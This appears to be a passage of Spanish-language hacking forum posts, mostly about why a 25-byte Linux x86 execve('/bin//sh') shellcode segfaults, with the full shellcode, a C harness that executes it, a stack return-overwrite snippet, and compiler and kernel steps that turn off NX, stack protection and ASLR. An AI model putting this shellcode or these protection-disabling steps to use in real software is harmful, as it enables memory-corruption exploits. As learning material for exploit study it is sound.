Mensajes

Ea, pero eso en parte sería un troyano de dispersión múltiple o algo así, no se, es algo raro llamar a eso Botnet.

Yo creo que si los Zeus eran troyanos de conexión inversa y fueron reclutados por un único cliente a la vez y recibieron la llamada a pillar contraseñas del mismo único cliente pueden ser considerados botnet.
Pero realmente no se hasta que punto funcionaron de forma colectiva o por separado y a lo mejor hay varias formas de verlo. ¿existen botnets de un único zombie o es un troyano? xD a lo mejor es válido pensarlo de las dos maneras. 

Supongo que la botnet Kneber, formada por un montón de infectados con el troyano Zeus, tenía la función pillar contraseñas implementada en Zeus y fue utilizada.
Yo entendí eso 

Puedes utilizar openssl. Te permite cifrar archivos con AES.
Te dejo un enlace donde se explica su funcionamiento:
http://www.emete.es/node/21

Hola!

Intenta compilar el código con estos parámetros:

Código [Seleccionar] Expandir


gcc -g -z execstack -fno-stack-protector -mpreferred-stack-boundary=2 -ggdb ejemplo.c


Yo he tenido muchos problemas por todo el tema de las protecciónes.

Gracuas por la ayuda M3st4ng, lo he solucionado despues de compilarlo con execstack -s shellcode.

Bueno yo me acabo de acordar de que le deje el disco a mi padre xD asi k menos mal... Google?  

Google si. Supuse que tenía alguna protección activada.
Para probar tu S.C. puse a cero /proc/sys/kernel/randomize_va_space y me extrañó que no funcionase, luego probé otras shellcodes que ya había corrido otras veces y seguían sin funcionar.

Saludos

[TinShell V1.0 : By Sagrini : 25 bytesFallo de segmentación]

snakingmax@thebigbrother:~/Escritorio/sc$ gcc -g -static -o shellcode shellcode.c
snakingmax@thebigbrother:~/Escritorio/sc$ ls
shellcode  shellcode.c
snakingmax@thebigbrother:~/Escritorio/sc$ ./shellcode
TinShell V1.0 : By Sagrini : 25 bytes
Fallo de segmentación
snakingmax@thebigbrother:~/Escritorio/sc$

Me autorespondo:
Tenía la Protección NX activada. Para desactivarla solamente para ese ejecutable hice esto:
snakingmax@thebigbrother:~/Escritorio/sc$ execstack -s shellcode

Saludos

[gcc -g -static -o shellcode shellcode.c]

Enhorabuena Sagrini me alegro de que al final lo hayas conseguido ^.^

Yo no consigo correr ninguna shellcode en mi equipo. Por ejemplo al tratar de probar la tuya me salta "Fallo de segmentación":

Código (c) [Seleccionar] Expandir


#include <stdio.h>
#include <string.h>

char code[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
printf ("TinShell V1.0 : By Sagrini : %d bytes\n", strlen (code));
(*(void(*)()) code)();
return 0;
}


snakingmax@thebigbrother:~/Escritorio/sc$ gcc -g -static -o shellcode shellcode.c
snakingmax@thebigbrother:~/Escritorio/sc$ ls
shellcode  shellcode.c
snakingmax@thebigbrother:~/Escritorio/sc$ ./shellcode
TinShell V1.0 : By Sagrini : 25 bytes
Fallo de segmentación
snakingmax@thebigbrother:~/Escritorio/sc$

He puesto a cero /proc/sys/kernel/randomize_va_space
Datos de mi distro:
DISTRIB_RELEASE=10.04
DISTRIB_CODENAME=lucid
DISTRIB_DESCRIPTION="Ubuntu 10.04.1 LTS"
Versión del compilador: gcc-4.4

Si podeis orientarme en qué puede estar pasando de agradece.
Saludos

Parece que tu shellcode fue testeada en Ubuntu 8.04 Hardy Heron.
Mira este enlace: http://www.shell-storm.org/shellcode/files/shellcode-690.php

Qué distro estás usando? A lo mejor esto te sirve para no tener que compilarlo: http://fasmdeb.googlecode.com/files/fasm%201.69.24i386.deb

char shellcode [ ] = "\xeb\x2a\x5e.../bin/ sh ";
void main() {
int *ret;
ret = ( int *)&ret + 2;
(*ret) = ( int)shellcode ; }

Fuente: http://www.google.es/url?sa=t&source=web&cd=1&sqi=2&ved=0CBoQFjAA&url=http%3A%2F%2Fwww.cs.northwestern.edu%2F~ychen%2Fclasses%2Fcs395-w05%2Flectures%2FSmashing%2520the%2520Stack.ppt&rct=j&q=ret%20%3D%20(int%20*)%26ret%20%2B%202%3B&ei=6RAiTYr9A8Ws8gPRz4DvBQ&usg=AFQjCNER0MzcA3Y_0xJwX7rfZNKbEgTKCw&sig2=j6DwqrVTlUi3Q0NvzDATVQ&cad=rja

Donde dice "\xeb\x2a\x5e.../bin/ sh " deberías colocar tu S.C.
Disculpas por modificar tanto el post 

Ok, ya comentas como te fue 

Debes reemplazar los '\' con '0' y ensamblarlo con FASM que está disponible para Linux tambien:

http://foro.elhacker.net/bugs_y_exploits/shellcodeopcode_to_asm-t277997.0.html